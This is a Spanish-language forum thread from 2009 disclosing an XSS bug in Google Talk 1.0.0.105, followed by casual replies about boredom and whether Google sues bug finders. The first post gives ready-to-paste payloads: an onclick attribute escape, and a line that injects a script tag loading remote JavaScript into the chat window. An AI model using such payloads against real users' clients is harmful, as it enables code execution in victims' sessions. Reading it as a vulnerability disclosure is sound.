Título: XSS en Google Talk 1.0.0.105 Publicado por: WHK en 18 Octubre 2009, 01:54 am Bueno, comenzé a probar en una virtual de gtalk a gtalk y me encontré con dos xss.
Por ejemplo cuando uno escribe un enlace http://<h1>test se ejecuta inmediatamente ya que el enío del string dentro de un href no se filtra y eso significa que un xss puede alojarse en el nombre de la url y el otro en la url misma como código html. Cuando escribimos http://<h1>test en realidad se imprime esto: <a href='http://<h1>test'>http://<h1>test</a> y como se utilizan comillas simples para los tags de html podemos escapar con http://'onclick='alert(/lol/)'x=' y quedará masomenos así: <a href='http://'onclick='alert(/lol/)'x=''>http://'onclick='alert(/lol/)'x='</a> xDD y el resultado es algo asi como esto: (http://www.webcomparte.com/archivos_publicos/imagenes/bugs/gtalk_xss1.png) Conversando con SirDarckCat estubimos casi toda la noche jugando con el google talk cambiandole el fondo por una imagen de doom3, paisajes, coloreando los bordes, letras hasta que a el se le ocurrió inyectar el firebug y saber un poco mas del código fuente ya que en realidad no habia archivo temporal porque utilizaba un iframe de internet explorer 6 con la dirección about:blank haciendo document.write (http://www.webcomparte.com/archivos_publicos/imagenes/bugs/gtalk_xss2.png) A los que quiean inyectar el firebug pueden escribir estas dos lineas: Citar http://'onclick='document.body.appendChild(document.createElement("script")).src="http://getfirebug.com/releases/lite/1.2/firebug-lite-compressed.js"'x=' hacerle click y luegoCitar http://'onclick='alert(firebug.init())'x=' y al hacerle click llamarán a firebug :PEstá entetenido. Para los que quieran descompilar el ejecutable del gtalk está cifrado en molebox 2.5.7 . Título: Re: XSS en Google Talk 1.0.0.105 Publicado por: kamsky en 18 Octubre 2009, 21:35 pm os aburris mucho,verdad¿¿ ;-) ;-) :P
Título: Re: XSS en Google Talk 1.0.0.105 Publicado por: Jubjub en 18 Octubre 2009, 21:38 pm Grandes ;D
Título: Re: XSS en Google Talk 1.0.0.105 Publicado por: Debci en 21 Octubre 2009, 15:06 pm que gente... se nota el tiempo libre jaja xDD
Y google no podria hacer nada al respecto? no pueden denunciaros o algo por el estilo?? Saludos Título: Re: XSS en Google Talk 1.0.0.105 Publicado por: :ohk<any> en 21 Octubre 2009, 15:58 pm genial ;D
Título: Re: XSS en Google Talk 1.0.0.105 Publicado por: jdc en 21 Octubre 2009, 17:53 pm Nah.... Google regala poleras xD
Título: Re: XSS en Google Talk 1.0.0.105 Publicado por: Debci en 21 Octubre 2009, 18:20 pm Nah.... Google regala poleras xD enserio, si haceis este tipo de cosas peuden tomar algun tipo de carga legal contra el atacante/tester?Saludos Título: Re: XSS en Google Talk 1.0.0.105 Publicado por: jdc en 21 Octubre 2009, 18:39 pm Conociendo a los descubridores... Google ya debe estar enterado y preparando una actualización xD
Título: Re: XSS en Google Talk 1.0.0.105 Publicado por: WHK en 21 Octubre 2009, 20:49 pm google no pierde el tiempo en demandar a la gente que encuentra bugs en sus sistemas, todo lo contrario.. deben sentirse agradecidos porque hay gente que trabaja gratuitamente buscando bugs en sus sistemas para hacerlos mejores y se ahorran los auditores de código :P de hecho si nadie desvelara ningun bug de windows todavía estaríamos en la tecnologia de win 98
Título: Re: XSS en Google Talk 1.0.0.105 Publicado por: Debci en 21 Octubre 2009, 22:05 pm google no pierde el tiempo en demandar a la gente que encuentra bugs en sus sistemas, todo lo contrario.. deben sentirse agradecidos porque hay gente que trabaja gratuitamente buscando bugs en sus sistemas para hacerlos mejores y se ahorran los auditores de código :P de hecho si nadie desvelara ningun bug de windows todavía estaríamos en la tecnologia de win 98 jaja ok xDSaludos Título: Re: XSS en Google Talk 1.0.0.105 Publicado por: sirdarckcat en 22 Octubre 2009, 03:39 am Citar Conversando con SirDarckCat estubimos casi toda la noche jugando con el google talk para mi era medio dia.. XDDDTítulo: Re: XSS en Google Talk 1.0.0.105 Publicado por: Zero_Bits en 22 Octubre 2009, 03:49 am Gran descubrimiento..
Que descuido de google xDDD Saludos.. Título: Re: XSS en Google Talk 1.0.0.105 Publicado por: OtroVientoMejor en 22 Octubre 2009, 05:50 am jajaja lo que es el ocio :P
en las salas de chat de www.tagged.com yo hacia lo mismo jaja hasta que alguien más se dio cuenta, le aviso a Alex y lo remodelaron todo desde 0, ya nada quedo igual :-[ Título: Re: XSS en Google Talk 1.0.0.105 Publicado por: дٳŦ٭ en 28 Octubre 2009, 00:17 am jajaja par de ociosos xDDD
Congrat! Título: Re: XSS en Google Talk 1.0.0.105 Publicado por: Skeletron en 1 Noviembre 2009, 02:35 am Que grande los chicos!
|